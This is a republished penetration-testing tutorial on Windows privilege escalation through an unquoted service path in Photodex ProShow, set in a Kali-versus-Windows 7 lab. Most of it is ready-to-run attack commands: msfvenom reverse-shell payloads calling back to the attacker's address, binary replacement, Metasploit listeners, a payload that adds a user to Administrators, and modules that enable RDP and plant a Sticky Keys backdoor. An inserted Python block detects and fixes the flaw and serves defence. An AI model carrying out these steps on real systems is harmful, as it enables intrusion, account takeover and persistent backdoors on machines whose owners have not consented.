
Windows Privilege Escalation (Unquoted Path Service)

[Category: System (Windows) | Published by 店小二05 | 2018 | Posted by 红领巾]

Hello Friends!! In this article we demonstrate Windows privilege escalation via an unquoted service path. During a penetration test, once we spawn a command shell as a local user we cannot read restricted files or folders, so we need to escalate privileges to obtain administrator access.

Table of contents

Introduction
Lab setup
Spawn command shell as local user
Escalate privileges via Prepend-migrate
Escalate privileges by adding a user to the Administrators group
Escalate privileges via RDP & Sticky Keys

Introduction

Unquoted Service Path Vulnerability

The vulnerability arises when the path to a service executable contains a space and is not enclosed in quotation marks (""). If, in addition, the location has writable permissions, an attacker can replace the executable with a malicious exe, which the service then runs with its own (administrator) privileges.

Lab set-up

Victim's machine: Windows 7

Attacker's machine: Kali Linux

First we downloaded and installed a vulnerable application named Photodex ProShow on the Windows system; we found it on Exploit DB.

Spawning Victim’s Machine

We need to have compromised the Windows machine at least once to obtain a meterpreter session. As you can see, we already have the victim's meterpreter session; now let's open a command shell from it.

shell

As you can see, we have shell access as local_user, and to get a cmd prompt as administrator we need to escalate privileges. First, we enumerate all auto-start services on the victim's machine and pick out those whose path is not enclosed in quotes, using the following command:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

This gives us the following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe. As you can see, the path is not enclosed in quotes and contains spaces.


Now let's check the permissions on the executable with the following command (run from inside the ProShow Producer folder):

icacls Scsiaccess.exe

As you can see, it grants write permission to Everyone, which means that user raj can overwrite this file.
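As an added defender's aid (not code from the original post or from Hacking Articles), the following Python reproduces how the Service Control Manager interprets an unquoted image path with spaces, lists the directories whose ACLs need checking with icacls, and builds the sc config line that quotes the path; it also shows the intermediate paths Windows tries before reaching Scsiaccess.exe, which the article does not walk through. The service name ScsiAccess and the two extra rows are constructed; only the ProShow image path comes from the article.

```python
# Constructed sample (not from the page's lab): (service name, PathName) pairs as
# the page's wmic command would list them; only the first image path is the article's.
SAMPLE_SERVICES = [
    ("ScsiAccess", r"C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe"),
    ("wuauserv", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\Some App\svc.exe" -run'),
]

def unquoted_candidates(pathname: str) -> list:
    """Files Windows tries, in order, when the SCM starts an unquoted image
    path: each space may end the program name and .exe is appended to a
    fragment without extension. [] if quoted or the exe name has no space."""
    pathname = pathname.strip()
    if not pathname or pathname.startswith('"'):
        return []
    tokens, tried = pathname.split(), []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        base = prefix.rsplit("\\", 1)[-1]
        tried.append(prefix if "." in base else prefix + ".exe")
        if base.lower().endswith((".exe", ".com", ".bat", ".cmd")):
            break  # reached the intended binary; later tokens are arguments
    return tried if len(tried) > 1 else []

def directories_to_audit(pathname: str) -> list:
    """Parent directory of every candidate; write access to any of them
    (check with icacls) lets a local user plant a file the service runs."""
    dirs = []
    for cand in unquoted_candidates(pathname):
        d = cand.rsplit("\\", 1)[0] + "\\"
        if d not in dirs:
            dirs.append(d)
    return dirs

def remediation_command(service: str, pathname: str) -> str:
    """Elevated sc.exe line that quotes the image path; sc.exe needs the space
    after 'binPath=' and the inner quotes escaped for cmd.exe."""
    exe = unquoted_candidates(pathname)[-1]
    args = pathname.strip()[len(exe):]
    return f'sc config {service} binPath= "\\"{exe}\\"{args}"'

if __name__ == "__main__":
    for name, path in SAMPLE_SERVICES:
        dirs = directories_to_audit(path)
        if not dirs:
            continue
        print(f"[!] {name}: unquoted image path with spaces")
        for d in dirs:
            print(f'    check: icacls "{d}"')
        print("    fix:  ", remediation_command(name, path))
```

Quoting the path with sc config removes the intermediate candidates; the writable-binary problem shown by icacls above still has to be fixed separately by tightening the ACL on the folder.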

Escalate privileges via Prepend-migrate

Now we can place a malicious exe in the same folder; when the service is restarted, Windows will launch this executable instead of the genuine one, giving us its administrator privileges.

Open a terminal in Kali Linux and run the following msfvenom command to generate the exe payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/Desktop/Scsiaccess.exe

The above command creates a malicious exe on the Desktop, which we then send to the victim. Because of prependmigrate, the payload migrates into another process (here explorer.exe), so the attacker does not lose the session if the victim kills the payload's original process.


Now replace the genuine executable with the malicious exe. Here I renamed the genuine Scsiaccess.exe to Scsiaccess.exe.original, uploaded the malicious Scsiaccess.exe into the same folder, and then rebooted the victim's machine.

move scsiaccess.exe scsiaccess.exe.original
upload /root/Desktop/Scsiaccess.exe
reboot

Meanwhile, we started a multi/handler listener in a new terminal to catch the meterpreter session with admin privileges.

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

Yuppie!! After some time we got a shell with admin privileges.

Escalate privileges by adding a user to the Administrators group

After spawning a shell as local_user, we enumerated the list of usernames, with and without admin privileges, and found that user raaz is not a member of the Administrators group.

net user
net user raaz

So again we generated an exe file, this time one that adds user raaz to the Administrators group. The name of the exe is the same, i.e. Scsiaccess.exe.

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/Scsiaccess.exe

Now repeat the steps above: replace the genuine executable with the malicious exe and reboot the host machine.


In the following image, you can see that user raaz has become a member of the Administrators group.

Escalate privileges via RDP & Sticky Keys

Generate an exe with msfvenom under the same name, Scsiaccess.exe, and transfer it to the victim's machine as before. Meanwhile, run multi/handler with an AutoRunScript that enables the RDP service once the session comes back after the service restarts.

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.107
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/enable_rdp
msf exploit(multi/handler) > exploit

Similarly, we set the AutoRunScript to enable Sticky Keys once the service restarts.

msf exploit(multi/handler) > set AutoRunScript post/windows/manage/sticky_keys
msf exploit(multi/handler) > run

As you can see in the screenshot below, another meterpreter session (session 3) opened with administrative rights. Now let's connect to the victim's host via RDP.

rdp 192.168.1.101

Now press the Shift key 5 times in a row and you will get a command prompt as administrator.


Source: https://www.exploit-db.com/exploits/24872/

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets.

Article title: Windows Privilege Escalation (Unquoted Path Service)
Page link: https://www.codesec.net/view/589086.html